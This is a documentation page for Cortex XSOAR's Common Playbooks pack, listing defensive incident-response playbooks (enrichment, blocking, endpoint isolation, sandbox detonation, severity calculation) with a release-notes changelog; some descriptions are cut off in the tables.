Determines if a critical asset is associated with the investigation. The playbook returns a severity level of "Critical" if at least one critical asset is associated with the investigation.
Critical assets refer to: users, user groups, endpoints, and endpoint groups.
Common Playbooks
Frequently used playbooks pack.
Name | Description |
---|---|
Calculate Severity - Critical Assets v2 | Determines if a critical asset is associated with the investigation. The playbook returns a severity level of "Critical" if at least one critical asset is associated with the investigation. |
Get File Sample From Path - Generic | Deprecated. Use inputs: |
Get endpoint details - Generic | Deprecated. Use the |
Detonate and Analyze File - Generic | This playbook uploads, detonates, and analyzes files for supported sandboxes. Currently supported sandboxes are Falcon Intelligence Sandbox, JoeSecurity, and Wildfire. |
Send Investigation Summary Reports | This playbook iterates over closed incidents, generates a summary report for each closed incident, and emails the reports to specified users. |
Block Indicators - Generic v2 | Deprecated. Use the |
DBot Indicator Enrichment - Generic | Get the indicators' internal DBot score. |
Account Enrichment - Generic v2.1 | Enrich accounts using one or more integrations. The playbook also supports the generic command 'iam-get-user' (implemented in IAM integrations). For more information, visit https://xsoar.pan.dev/docs/integrations/iam-integrations. |
Calculate Severity - Generic v2 | Calculate and assign the incident severity based on the highest returned severity level from the following calculations: |
Field Polling - Generic | This playbook polls a field to check if a specific value exists. |
Cloud Enrichment - Generic | Generic Cloud Enrichment Playbook. The Cloud Enrichment - Generic playbook is designed to unify all the relevant playbooks concerning the enrichment of information in the cloud. It provides a standardized approach to enriching information in cloud environments. Supported Blocks: the playbook supports a single CSP enrichment at a time. |
Block Account - Generic | Deprecated. Use 'Block Account - Generic v2' instead. This playbook blocks malicious usernames using all integrations that you have enabled. Supported integrations for this playbook: |
Block IP - Generic v2 | Deprecated. Use the Supported integrations for this playbook: |
Email Headers Check - Generic | This playbook executes one sub-playbook and one automation to check the email headers: |
Get User Devices by Username - Generic | This playbook retrieves information on all of the associated user devices, based on the user's username. Note that not all of the supported integrations will be able to retrieve this information. Supported integrations: |
Detonate File - Generic | Detonate files through one or more active integrations that support file detonation. |
Cloud Compute Enrichment - Generic | This playbook provides a generic enrichment of AWS, GCP, and Azure compute resources. |
SIEM - Search for Failed logins | This playbook searches for failed logons for a specific user by querying logs from different sources. Supported Integrations: |
Block IP - Generic v3 | This playbook blocks malicious IP addresses using all integrations that are enabled. The direction of the traffic that will be blocked is determined by the XSOAR user (and set by default to outgoing). Supported integrations for this playbook [network security products such as FW/WAF/IPS/etc.]: |
Get Cloud Account Owner - Generic | Retrieves the owners of a cloud account based on account ID. |
Convert file hash to corresponding hashes | The playbook enables you to get all of the corresponding file hashes for a file even if there is only one hash type available. |
Command-Line Analysis | This playbook takes a command line from the alert and performs the following actions: At the end of the playbook, it sets a possible verdict for the command line, based on the findings: Note: To run this playbook with a list of command lines, set this playbook to run in a loop. To do so, navigate to 'Loop' and check "For Each Input". |
User Investigation - Generic | This playbook performs an investigation on a specific user, using queries and logs from SIEM, identity management systems, XDR, and firewalls. Supported Integrations: |
Get File Sample From Path - Generic V2 | Deprecated. Use |
Block Indicators - Generic v3 | This playbook blocks malicious indicators using all integrations that are enabled, using the following sub-playbooks: |
Block Email - Generic | Deprecated. Use 'Block Email - Generic v2' instead. This playbook will block emails at your mail relay integration. |
Block Email - Generic v2 | This playbook will block emails at your mail relay integration. Supported integrations for this playbook: |
IP Enrichment - External - Generic v2 | Enrich IP addresses using one or more integrations. |
Cloud IAM Enrichment - Generic | This playbook is responsible for collecting and enriching data on Identity Access Management (IAM) in cloud environments (AWS, Azure, and GCP). |
Get User Devices by Email Address - Generic | This playbook retrieves information on all of the associated user devices, based on the user's email address. Note that not all of the supported integrations will be able to retrieve this information. Supported integrations: |
Send Investigation Summary Reports Job | You should run this playbook as a scheduled job, which should run at an interval of once every 15 minutes. This playbook functions by calling the sub-playbook "Send Investigation Summary Reports", and closes the incident. By default, the playbook will search all incidents closed within the last hour. If you want to run the playbook more frequently, you should adjust the search query of the child playbook "Send Investigation Summary Reports". |
Endpoint Enrichment - Generic v2.1 | Enrich an endpoint by hostname using one or more integrations. |
Block File - Generic v2 | This playbook is used to block files from running on endpoints. |
Dedup - Generic v3 | Deprecated. Use the |
Calculate Severity - 3rd-party integrations | Calculates the incident severity level according to the methodology of a 3rd-party integration. |
Cloud Credentials Rotation - Generic | Cloud Credentials Rotation - Generic. This comprehensive playbook combines the remediation steps from the AWS, Azure, and GCP sub-playbooks into a single, cohesive guide. Regardless of which Cloud Service Provider (CSP) you're working with, this playbook will direct you to the relevant steps, ensuring a swift and effective response. The primary objective is to offer an efficient way to address compromised credentials across different cloud platforms. By consolidating the key steps from AWS, Azure, and GCP, it minimizes the time spent searching for platform-specific procedures and accelerates the remediation process, ensuring the highest level of security for your cloud environments. Integrations for Each Sub-Playbook: in order to seamlessly execute the actions mentioned in each sub-playbook, specific integrations are essential. These integrations facilitate the automated tasks and processes that the playbook carries out. Here are the required integrations for each sub-playbook: AWS Sub-Playbook: GCP Sub-Playbook: Azure Sub-Playbook: |
Isolate Endpoint - Generic | Deprecated. Use the "Isolate Endpoint - Generic V2" playbook instead. |
Calculate Severity - Standard | Calculates and sets the incident severity based on the combination of the current incident severity and the severity returned from the Calculate Severity By Highest DBotScore playbook. |
Cloud User Investigation - Generic | This playbook performs an investigation on a specific user in cloud environments, using queries and logs from Azure Log Analytics, AWS CloudTrail, G Suite Auditor, and GCP Logging. |
Entity Enrichment - Generic v2 | Enrich entities using one or more integrations. |
Retrieve File from Endpoint - Generic V3 | This playbook retrieves a file sample from an endpoint using the following playbooks: |
Get File Sample - Generic | Retrieves files from endpoints by the file hash or the file path. |
Search Endpoints By Hash - Generic V2 | Hunt using available tools. |
Isolate Endpoint - Generic V2 | This playbook isolates a given endpoint using various endpoint product integrations. |
Get File Sample From Path - Generic V3 | This playbook returns a file sample from a specified path and host that you input, using the following playbooks: |
Unisolate Endpoint - Generic | This playbook unisolates endpoints according to the endpoint ID or host name provided in the playbook. |
Search Endpoint by CVE - Generic | Hunt for assets with a given CVE using available tools. |
Block Domain - Generic v2 | This playbook blocks malicious domains using all integrations that are enabled. Supported integrations for this playbook: |
Get File Sample By Hash - Generic v3 | This playbook returns a file sample correlating to a hash in the War Room using the following sub-playbooks: |
Get File Sample By Hash - Generic v2 | Deprecated. Use |
Retrieve File from Endpoint - Generic | Deprecated. Use |
Entity Enrichment - Generic v3 | Enrich entities using one or more integrations. |
GenericPolling | Use this playbook as a sub-playbook to block execution of the master playbook until a remote action is complete. |
Get Email From Email Gateway - Generic | This playbook retrieves a specified EML/MSG file directly from the email security gateway product. |
Search For Hash In Sandbox - Generic | This playbook searches for a specific hash in the supported sandboxes. If the hash is known, the playbook provides a detailed analysis of the sandbox report. Currently supported sandboxes are Falcon Intelligence Sandbox, Wildfire, and Joe Sandbox. |
Unzip File | This playbook checks whether a file has an extension that supports unzipping, and unzips the file. |
Search And Delete Emails - Generic v2 | This playbook searches for and deletes emails with attributes similar to those of a malicious email, using one of the following integrations: EWS, Office 365, Gmail, Agari Phishing Defense. |
Domain Enrichment - Generic v2 | Enrich domains using one or more integrations. |
Dedup - Generic v4 | This playbook identifies duplicate incidents using the Cortex XSOAR machine learning method (script). Note: To identify similar incidents you must properly define the playbook inputs. |
IP Enrichment - Internal - Generic v2 | Enrich internal IP addresses using one or more integrations. |
Block Domain - Generic | Deprecated. Use 'Block Domain - Generic v2' instead. This playbook blocks malicious domains using all integrations that are enabled. Supported integrations for this playbook: |
File Enrichment - File reputation | Get file reputation using one or more integrations. |
Calculate Severity By Highest DBotScore | Calculates the incident severity level according to the highest DBotScore. |
Block Account - Generic v2 | This playbook blocks malicious usernames using all integrations that you have enabled. Supported integrations for this playbook: |
Detonate URL - Generic v1.5 | Detonate URLs through one or more active integrations that support URL detonation. |
Search And Block Software - Generic | This playbook searches for the file or process activity of a piece of software by a given image file name. The analyst can then choose the files to block. |
Block URL - Generic v2 | This playbook blocks malicious URLs using all integrations that are enabled. Supported integrations for this playbook: |
Search And Delete Emails - Generic | Deprecated. Use |
Detonate URL - Generic | Deprecated. Use the Detonate URL - Generic v1.5 playbook instead. Detonate URLs through active integrations that support URL detonation. |
Search and Compare Process Executions - Generic | This generic playbook receives a process name and a command-line argument. It searches for executions of the given process and compares the command-line argument from the results to the command-line argument received from the playbook input. The playbook supports searching process executions using the following integrations: Note: Under the "Processes" input, the playbook should receive an array that contains the following keys: |
File Enrichment - Generic v2 | Enrich a file using one or more integrations. |
Get Original Email - Generic | Deprecated. Use the "Get Original Email - Generic v2" playbook under the "Phishing" pack instead. |
Calculate Severity - Indicators DBotScore | Calculates the incident severity level according to the highest indicator DBotScore. |
Email Address Enrichment - Generic v2.1 | Enrich email addresses. |
URL Enrichment - Generic v2 | Enrich URLs using one or more integrations. URL enrichment includes: |
IP Enrichment - Generic v2 | Enrich IP addresses using one or more integrations. When executing this playbook through IP Enrichment - Generic v2, IP classification and resolution will be handled by the main playbook, improving performance. |
Extract Indicators From File - Generic v2 | This playbook extracts indicators from a file. |
Indicator Registration Polling - Generic | This playbook polls all indicators to check if they exist. |
Threat Hunting - Generic | This playbook enables threat hunting for IOCs in your enterprise. It currently supports the following integrations: |
Cloud Response - Generic | This playbook provides response playbooks for: The response actions available are: |
Context Polling - Generic | This playbook polls a context key to check if a specific value exists. |
Wait Until Datetime | Pauses execution until the date and time specified in the playbook input is reached. |
Get host forensics - Generic | This playbook retrieves forensics from hosts for the following integrations: |
Retrieve File from Endpoint - Generic V2 | Deprecated. Use |
Get User Devices - Generic | This playbook retrieves information on all of the associated user devices. Note that not all of the supported integrations will be able to retrieve this information. In order to get the full list of supported integrations, read the descriptions of the following sub-playbooks: |
Block URL - Generic | Deprecated. Use 'Block URL - Generic v2' instead. |
CVE Enrichment - Generic v2 | This playbook performs CVE enrichment using the following integrations: |
Dedup - Generic v2 | Deprecated. Use the Dedup Generic v3 playbook instead. This playbook identifies duplicate incidents using one of the supported methods. |
Name | Description |
---|---|
IP Enrichment - Internal - Generic v2 | Enrich internal IP addresses using one or more integrations. |
Block Domain - Generic | Deprecated. Use 'Block Domain - Generic v2' instead. This playbook blocks malicious domains using all integrations that are enabled. Supported integrations for this playbook: |
Indicator Registration Polling - Generic | This playbook polls all indicators to check if they exist. |
Endpoint Investigation Plan | This playbook handles all the endpoint investigation actions by performing the following tasks on every alert associated with the alert: Note: The playbook inputs enable manipulating the execution flow; read the input descriptions for details. |
Block Indicators - Generic v3 | This playbook blocks malicious indicators using all integrations that are enabled, using the following sub-playbooks: |
Dedup - Generic v4 | This playbook identifies duplicate alerts using the Cortex XSIAM machine learning method (script). Note: To identify similar alerts you must properly define the playbook inputs. |
Field Polling - Generic | This playbook polls a field to check if a specific value exists. |
Context Polling - Generic | This playbook polls a context key to check if a specific value exists. |
Eradication Plan - Reset Password | This playbook is one of the sub-playbooks in the eradication plan. |
Search and Compare Process Executions - Generic | This generic playbook receives a process name and a command-line argument. It searches for executions of the given process and compares the command-line argument from the results to the command-line argument received from the playbook input. The playbook supports searching process executions using the following integrations: Note: Under the "Processes" input, the playbook should receive an array that contains the following keys: |
URL Enrichment - Generic v2 | Enrich URLs using one or more integrations. URL enrichment includes: |
Calculate Severity - Indicators DBotScore | Calculates the alert severity level according to the highest indicator DBotScore. |
Get User Devices - Generic | This playbook retrieves information on all of the associated user devices. Note that not all of the supported integrations will be able to retrieve this information. In order to get the full list of supported integrations, read the descriptions of the following sub-playbooks: |
Command-Line Analysis | This playbook takes a command line from the alert and performs the following actions: At the end of the playbook, it sets a possible verdict for the command line, based on the findings: Note: To run this playbook with a list of command lines, set this playbook to run in a loop. To do so, navigate to 'Loop' and check "For Each Input". |
File Enrichment - Generic v2 | Enrich a file using one or more integrations. |
Convert file hash to corresponding hashes | The playbook enables you to get all of the corresponding file hashes for a file even if there is only one hash type available. |
Cloud Response - Generic | This playbook provides response playbooks for: The response actions available are: |
Get Cloud Account Owner - Generic | Retrieves the owners of a cloud account based on account ID. |
Domain Enrichment - Generic v2 | Enrich domains using one or more integrations. |
Search Endpoints By Hash - Generic V2 | Hunt using available tools. |
Detonate URL - Generic v1.5 | Detonate URLs through one or more active integrations that support URL detonation. |
DBot Indicator Enrichment - Generic | Get the indicators' internal DBot score. |
Get File Sample From Path - Generic | Deprecated. Use inputs: |
Containment Plan - Isolate Device | Containment Plan - Isolate Device. This playbook is a sub-playbook within the containment plan playbook. |
Unzip File | This playbook checks whether a file has an extension that supports unzipping, and unzips the file. |
Get File Sample From Path - Generic V3 | This playbook returns a file sample from a specified path and host that you input, using the following playbooks: |
Detonate File - Generic | Detonate files through one or more active integrations that support file detonation. |
Eradication Plan | This playbook handles all the eradication actions available with Cortex XSIAM, including the following sub-playbooks: Note: The playbook inputs enable manipulating the execution flow. Read the input descriptions for details. |
Search And Delete Emails - Generic v2 | This playbook searches for and deletes emails with attributes similar to those of a malicious email, using one of the following integrations: EWS, Office 365, Gmail, Agari Phishing Defense. |
Block Domain - Generic v2 | This playbook blocks malicious domains using all integrations that are enabled. Supported integrations for this playbook: |
Retrieve File from Endpoint - Generic V3 | This playbook retrieves a file sample from an endpoint using the following playbooks: |
Block Account - Generic | Deprecated. Use 'Block Account - Generic v2' instead. This playbook blocks malicious usernames using all integrations that you have enabled. Supported integrations for this playbook: |
Get prevalence for IOCs | The playbook queries the analytics module to receive the prevalence of an IOC. Supported IOC types: |
Calculate Severity - 3rd-party integrations | Calculates the alert severity level according to the methodology of a 3rd-party integration. |
Endpoint Enrichment - Generic v2.1 | Enrich an endpoint by hostname using one or more integrations. |
Cloud Credentials Rotation - Generic | Cloud Credentials Rotation - Generic. This comprehensive playbook combines the remediation steps from the AWS, Azure, and GCP sub-playbooks into a single, cohesive guide. Regardless of which Cloud Service Provider (CSP) you're working with, this playbook will direct you to the relevant steps, ensuring a swift and effective response. The primary objective is to offer an efficient way to address compromised credentials across different cloud platforms. By consolidating the key steps from AWS, Azure, and GCP, it minimizes the time spent searching for platform-specific procedures and accelerates the remediation process, ensuring the highest level of security for your cloud environments. Integrations for Each Sub-Playbook: in order to seamlessly execute the actions mentioned in each sub-playbook, specific integrations are essential. These integrations facilitate the automated tasks and processes that the playbook carries out. Here are the required integrations for each sub-playbook: AWS Sub-Playbook: GCP Sub-Playbook: Azure Sub-Playbook: |
Enrichment for Verdict | This playbook checks prior alert closing reasons and performs enrichment and prevalence checks on different IOC types. It then returns the information needed to establish the alert's verdict. |
Block Account - Generic v2 | This playbook blocks malicious usernames using all integrations that you have enabled. Supported integrations for this playbook: |
Retrieve File from Endpoint - Generic | Deprecated. Use |
Containment Plan | This playbook handles the main containment actions available with Cortex XSIAM, including the following sub-playbooks: Note: The playbook inputs enable manipulating the execution flow. Read the input descriptions for details. |
Wait Until Datetime | Pauses execution until the date and time specified in the playbook input is reached. |
Get host forensics - Generic | This playbook retrieves forensics from hosts for the following integrations: |
Cloud Compute Enrichment - Generic | This playbook provides a generic enrichment of AWS, GCP, and Azure compute resources. |
Email Headers Check - Generic | This playbook executes one sub-playbook and one automation to check the email headers: |
Block IP - Generic v2 | Deprecated. Use the Supported integrations for this playbook: |
Block Indicators - Generic v2 | Deprecated. Use the |
Get endpoint details - Generic | Deprecated. Use the |
Get Email From Email Gateway - Generic | This playbook retrieves a specified EML/MSG file directly from the email security gateway product. |
IP Enrichment - External - Generic v2 | Enrich IP addresses using one or more integrations. |
File Reputation | This playbook checks the file reputation and sets the verdict as a new context key. The verdict is composed of 3 main components: Note: a user can provide their own list of trusted signers using the playbook inputs. |
Containment Plan - Block Indicators | Containment Plan - Block Indicators. This playbook is a sub-playbook within the containment plan playbook. Indicator Blocking: the playbook blocks indicators by two methods: |
Block Email - Generic v2 | This playbook will block emails at your mail relay integration. Supported integrations for this playbook: |
CVE Enrichment - Generic v2 | This playbook performs CVE enrichment using the following integrations: |
SIEM - Search for Failed logins | This playbook searches for failed logons for a specific user by querying logs from different sources. Supported Integrations: |
Containment Plan - Disable Account | Containment Plan - Disable Account. This playbook is a sub-playbook within the containment plan playbook. |
Get File Sample - Generic | Retrieves files from endpoints by the file hash or the file path. |
GenericPolling | Use this playbook as a sub-playbook to block execution of the master playbook until a remote action is complete. |
Email Address Enrichment - Generic v2.1 | Enrich email addresses. |
Recovery Plan | This playbook handles all the recovery actions available with Cortex XSIAM, including the following tasks: Note: The playbook inputs enable manipulating the execution flow; read the input descriptions for details. |
File Enrichment - File reputation | Get file reputation using one or more integrations. |
Containment Plan - Clear User Sessions | Containment Plan - Clear User Sessions. This playbook is a sub-playbook within the containment plan playbook. |
Get File Sample By Hash - Generic v3 | This playbook returns a file sample correlating to a hash in the War Room using the following sub-playbooks: |
Block File - Generic v2 | This playbook is used to block files from running on endpoints. |
Search Endpoint by CVE - Generic | Hunt for assets with a given CVE using available tools. |
Calculate Severity - Standard | Calculates and sets the alert severity based on the combination of the current alert severity and the severity returned from the Calculate Severity By Highest DBotScore playbook. |
Account Enrichment - Generic v2.1 | Enrich accounts using one or more integrations. The playbook also supports the generic command 'iam-get-user' (implemented in IAM integrations). For more information, visit https://xsoar.pan.dev/docs/integrations/iam-integrations. |
Block URL - Generic | Deprecated. Use 'Block URL - Generic v2' instead. |
Containment Plan - Quarantine File | Containment Plan - Quarantine File. This playbook is a sub-playbook within the containment plan playbook. |
Threat Hunting - Generic | This playbook enables threat hunting for IOCs in your enterprise. It currently supports the following integrations: |
Dedup - Generic v2 | Deprecated. Use the Dedup Generic v3 playbook instead. This playbook identifies duplicate alerts using one of the supported methods. |
Unisolate Endpoint - Generic | This playbook unisolates endpoints according to the endpoint ID or host name provided in the playbook. |
Isolate Endpoint - Generic V2 | This playbook isolates a given endpoint using various endpoint product integrations. |
Ticket Management - Generic | |
Cloud IAM Enrichment - Generic | This playbook is responsible for collecting and enriching data on Identity Access Management (IAM) in cloud environments (AWS, Azure, and GCP). |
Detonate URL - Generic | Deprecated. Use the Detonate URL - Generic v1.5 playbook instead. Detonate URLs through active integrations that support URL detonation. |
Cloud Enrichment - Generic | Generic Cloud Enrichment Playbook. The Cloud Enrichment - Generic playbook is designed to unify all the relevant playbooks concerning the enrichment of information in the cloud. It provides a standardized approach to enriching information in cloud environments. Supported Blocks: the playbook supports a single CSP enrichment at a time. |
Entity Enrichment - Generic v2 | Enrich entities using one or more integrations. |
Get User Devices by Email Address - Generic | This playbook retrieves information on all of the associated user devices, based on the user's email address. Note that not all of the supported integrations will be able to retrieve this information. Supported integrations: |
Entity Enrichment - Generic v3 | Enrich entities using one or more integrations. |
Get File Sample From Path - Generic V2 | Deprecated. Use |
Search And Block Software - Generic | This playbook searches for the file or process activity of a piece of software by a given image file name. The analyst can then choose the files to block. |
Get File Sample By Hash - Generic v2 | Deprecated. Use |
Get Original Email - Generic | Deprecated. Use the "Get Original Email - Generic v2" playbook under the "Phishing" pack instead. |
Send Investigation Summary Reports | This playbook iterates over closed alerts, generates a summary report for each closed alert, and emails the reports to specified users. |
Get User Devices by Username - Generic | This playbook retrieves information on all of the associated user devices, based on the user's username. Note that not all of the supported integrations will be able to retrieve this information. Supported integrations: |
Calculate Severity - Critical Assets v2 | Determines if a critical asset is associated with the investigation. The playbook returns a severity level of "Critical" if at least one critical asset is associated with the investigation. |
Extract Indicators From File - Generic v2 | This playbook extracts indicators from a file. |
User Investigation - Generic | This playbook performs an investigation on a specific user, using queries and logs from SIEM, identity management systems, XDR, and firewalls. Supported Integrations: |
Eradication Plan - Terminate Process | This playbook is one of the sub-playbooks in the eradication plan. |
Cloud User Investigation - Generic | This playbook performs an investigation on a specific user in cloud environments, using queries and logs from Azure Log Analytics, AWS CloudTrail, G Suite Auditor, and GCP Logging. |
Detonate and Analyze File - Generic | This playbook uploads, detonates, and analyzes files for supported sandboxes. Currently supported sandboxes are Falcon Intelligence Sandbox, JoeSecurity, and Wildfire. |
Handle False Positive Alerts | This playbook handles false positive alerts. |
Calculate Severity - Generic v2 | Calculate and assign the alert severity based on the highest returned severity level from the following calculations: |
Isolate Endpoint - Generic | Deprecated. Use the "Isolate Endpoint - Generic V2" playbook instead. |
Block IP - Generic v3 | This playbook blocks malicious IP addresses using all integrations that are enabled. The direction of the traffic that will be blocked is determined by the XSOAR user (and set by default to outgoing). Supported integrations for this playbook [network security products such as FW/WAF/IPS/etc.]: |
Calculate Severity By Highest DBotScore | Calculates the alert severity level according to the highest DBotScore. |
Retrieve File from Endpoint - Generic V2 | Deprecated. Use |
Block Email - Generic | Deprecated. Use 'Block Email - Generic v2' instead. This playbook will block emails at your mail relay integration. |
Dedup - Generic v3 | Deprecated. Use the |
Block URL - Generic v2 | This playbook blocks malicious URLs using all integrations that are enabled. Supported integrations for this playbook: |
Eradication Plan - Delete File | This playbook is one of the sub-playbooks in the eradication plan. |
IP Enrichment - Generic v2 | Enrich IP addresses using one or more integrations. When executing this playbook through IP Enrichment - Generic v2, IP classification and resolution will be handled by the main playbook, improving performance. |
Search And Delete Emails - Generic | Deprecated. Use |
Pack Name | Pack By |
---|---|
Base | By: Cortex XSOAR |
Common Scripts | By: Cortex XSOAR |
Filters And Transformers | By: Cortex XSOAR |
Rasterize | By: Cortex XSOAR |
Pack Name | Pack By |
---|---|
Filters And Transformers | By: Cortex XSOAR |
Rasterize | By: Cortex XSOAR |
Base | By: Cortex XSOAR |
Cortex REST API | By: Cortex XSOAR |
Common Scripts | By: Cortex XSOAR |
Playbooks
Search For Hash In Sandbox - Generic
Fixed an issue where a CrowdStrike report was retrieved only for a single SHA256 file instead of for multiple SHA256 files.
Extract Indicators From File - Generic v2
Added the ability to extract hyperlinks from Office files (supporting .xlsx, .pptx, and .docx).
- 33634
Playbooks
Entity Enrichment - Generic v2
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
IP Enrichment - External - Generic v2
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
IP Enrichment - Internal - Generic v2
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
IP Enrichment - Generic v2
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
Threat Hunting - Generic
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
Entity Enrichment - Generic v3
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
Block IP - Generic v3
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
Block Indicators - Generic v3
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
- 33201
Playbooks
Threat Hunting - Generic
Updated the playbook description.
Command-Line Analysis
Updated the playbook description.
File Enrichment - Generic v2
Updated the playbook description.
Account Enrichment - Generic v2.1
Updated the playbook description.
IP Enrichment - Generic v2
Updated the playbook description.
User Investigation - Generic
Updated the playbook description.
- 32867
Playbooks
Block Email - Generic v2
Removed the command netcraft-report-attack. This command has been deprecated and has reached its end-of-life (EOL) date.
The playbook will use the command netcraft-attack-report instead.
Block URL - Generic v2
Removed the command cisco-email-security-list-entry-add. This command has been deprecated and has reached its end-of-life (EOL) date.
The playbook will use the command cisco-sma-list-entry-append from the integration 'CiscoSMA' instead.
- 33126
Playbooks
Detonate URL - Generic v1.5
- Fixed an issue where the Detonate URL - ThreatGrid v2 sub-playbook was not skipped when the integration was unavailable, and raised the default values of the Interval and Timeout inputs.
Command-Line Analysis
- Removed the unnecessary Append transformer from the extractIndicators task.
- Added a "RemoveEmpty" transformer to the "Set original commandline" task.
- 32828
Playbooks
Block Indicators - Generic v3
Fixed a bug in the "Set indicators to block" task that caused errors.
Detonate URL - Generic v1.5
- Removed the duplicated 'Detonate Url - WildFire' sub-playbook.
- Added detonation with the JoeSecurity vendor.
- Removed the unnecessary section header of "Detonate URL - VirusTotal (API v3)".
- Removed the unnecessary Check URL condition.
- 32333
Playbooks
Calculate Severity By Highest DBotScore
- Changed the inputs of this playbook. If you customized the playbook input to anything other than the DBotScore object, you will need to adjust to the new inputs. The playbook now accepts a list of unique DBotScore indicators and the maximum score given to an indicator, instead of the full DBotScore object.
- Improved the performance of the playbook and reduced the size of the context.
Calculate Severity - Generic v2
- Changed the inputs of this playbook. If you customized the playbook input to anything other than the DBotScore object, you will need to adjust to the new inputs. The playbook now accepts a list of unique DBotScore indicators and the maximum score given to an indicator, instead of the full DBotScore object.
- Improved the performance of the playbook and reduced the size of the context.
Calculate Severity - Standard
- Changed the inputs of this playbook. If you customized the playbook input to anything other than the DBotScore object, you will need to adjust to the new inputs. The playbook now accepts a list of unique DBotScore indicators and the maximum score given to an indicator, instead of the full DBotScore object.
- Improved the performance of the playbook and reduced the size of the context.
- 32144
Playbooks
Extract Indicators From File - Generic v2
- Performance improvements: the playbook no longer saves duplicate files locally and uses the inputs directly instead. This change preserves backward compatibility.
- Added the MaxImagesFromPDF input, which defines the maximum number of images to extract from a PDF file. The default value is 10, intended to improve performance for PDF files that contain large numbers of images.
Wait Until Datetime
- Added a 'Round' transformer for the 'Sleep' command used in the playbook.
- 31936
Playbooks
Block Indicators - Generic v3
Added a condition to verify if any indicators exist at the beginning of the playbook.
Cloud Response - Generic
Fixed a typo in a playbook input.
New: Get Cloud Account Owner - Generic
New: Retrieves the owners of a cloud account based on account ID.
Current supported platforms:
- GCP
- Prisma Cloud (Available from Cortex XSOAR 6.10.0).
- 31679
Playbooks
IP Enrichment - Internal - Generic v2
- Added the "ExecutedFromParent" input which, when set to True, will skip common logic and let the parent enrichment playbook execute it instead. The default value is False, which will preserve backward-compatibility for users who are using this playbook directly.
- Added additional missing outputs to the playbook.
IP Enrichment - External - Generic v2
- Added the "ExecutedFromParent" input which, when set to True, will skip common logic and let the parent enrichment playbook execute it instead. The default value is False, which will preserve backward-compatibility for users who are using this playbook directly.
- Fixed an issue where getting reputation for external IPs failed the playbook.
- Added additional missing outputs to the playbook.
IP Enrichment - Generic v2
- Improved playbook performance and reduced incident size significantly.
- Added the "ExecutedFromParent" input which, when set to True, will perform common logic on the parent playbook once, instead of twice in the enrichment sub-playbooks.
- Added additional missing outputs to the playbook.
- 31321
- 31147
Playbooks
Detonate File - Generic
The sub-playbook "Detonate File - CrowdStrike Falcon Intelligence Sandbox" was replaced with a new version "Detonate File - CrowdStrike Falcon Intelligence Sandbox v2".
Detonate URL - Generic v1.5
The sub-playbook "Detonate URL - CrowdStrike Falcon Intelligence Sandbox" was replaced with a new version "Detonate URL - CrowdStrike Falcon Intelligence Sandbox v2".
- 31330
Playbooks
IP Enrichment - Generic v2
- Updated the playbook description.
- Updated the playbook output to include missing sub-playbook outputs.
- Added new playbook inputs, 'extended_data' and 'threat_model_association' to indicate if extended data and enhanced reputation are returned by the 'IP Enrichment - External - Generic v2' sub-playbook.
- Updated the 'ResolveIP' playbook input to use 'False' as the default value.
- Updated the 'InternalRange' playbook input's default value.
- 31183
Playbooks
Endpoint Enrichment - Generic v2.1
- Updated the 'EndpointID' playbook input to use 'Endpoint.ID' as the default value.
- Updated the 'IPAddress' playbook input to use 'Endpoint.IPAddress' as the default value.
- Updated the playbook's task descriptions.
- Updated the playbook output to include missing command outputs.
- 31147
Playbooks
IP Enrichment - External - Generic v2
- Updated the playbook description.
- Added new playbook inputs, 'extended_data' and 'threat_model_association' to indicate if extended data and enhanced reputation are returned by the IP reputation command.
- Updated the playbook output to include missing command outputs.
- Deprecated the 'Threat Crowd' enrichment section.
IP Enrichment - Internal - Generic v2
- Updated the 'InternalRange' playbook input default value.
- Updated the 'ResolveIP' playbook input to use 'True' as the default value.
- Updated the playbook output to include missing command outputs.
- 31114
Playbooks
Dedup - Generic v4
- Added the 'DBotFindSimilarIncidentsByIndicators' context key to the playbook outputs.
- Updated tasks and playbook descriptions.
File Enrichment - Generic v2
- Updated tasks and playbook descriptions.
- Updated the playbook output to include missing sub-playbook and command outputs.
- 31023
Playbooks
Detonate URL - Generic v1.5
- Updated the playbook output to include several missing command outputs for ThreatGrid v2, McAfee Advanced Threat Defense, JoeSecurity, Lastline v2, Polygon, CrowdStrike Falcon Intelligence Sandbox, WildFire, VirusTotal (API v3), VMRay, FireEyeAX, SecneurX Analysis, CrowdStrike Falcon, and OPSWAT Filescan integrations.
- Fixed an issue with playbook outputs listing unnecessary command outputs.
- Updated the playbook description.
- Updated the 'URL' playbook input value.
Cloud User Investigation - Generic
Updated the outputs description.
User Investigation - Generic
- Fixed an issue where Cortex Core was not utilized in the user investigation in XSIAM.
- Fixed an issue where sometimes the username was incorrect in the PAN-OS firewall threat log search.
- Fixed an issue where the username input was causing an error in the "Cortex XDR - Get entity alerts by MITRE tactics" playbook.
- 30874
Playbooks
New: Search and Compare Process Executions - Generic
- New: This playbook is a generic playbook that receives a process name and a command-line argument. It searches for executions of the given process and compares the command-line argument from the results to the command-line argument received from the playbook input. The playbook supports searching process executions using the following integrations:
- Cortex XDR XQL Engine
- Cortex XDR IR (search executions inside XDR alerts)
- Microsoft Defender For Endpoint
Note: Under the "Processes" input, the playbook should receive an array whose items contain the following keys:
- value: process name
- commands: command-line arguments
(Available from Cortex XSOAR 6.9.0).
New: Search And Block Software - Generic
- New: This playbook searches the file or process activity of a software by a given image file name. The analyst can then choose the files to block.
The following integrations are supported:
- Cortex XDR XQL Engine
- Microsoft Defender For Endpoint
(Available from Cortex XSOAR 6.9.0).
- 28853
Playbooks
Get File Sample From Path - Generic V3
Added the AcquiredFile output, which will help to distinguish the existing files from the file that has just been retrieved.
Detonate File - Generic
- Updated the playbook output to include several missing command outputs for SecneurXAnalysis, McAfee Advanced Threat Defense, Lastline, JoeSecurity, Polygon, CrowdStrike Falcon Intelligence Sandbox, and OPSWAT Filescan integrations.
- Deprecated sub-playbooks were removed, including Detonate File - ThreatGrid, Detonate File - JoeSecurity, CrowdStrike Falcon Sandbox - Detonate file, Detonate File - HybridAnalysis.
- Updated the playbook description.
Detonate and Analyze File - Generic
- Updated the playbook output to include several missing command outputs for the JoeSecurity V2 integration.
- Updated the playbook description.
- 30206
Playbooks
Calculate Severity By Highest DBotScore
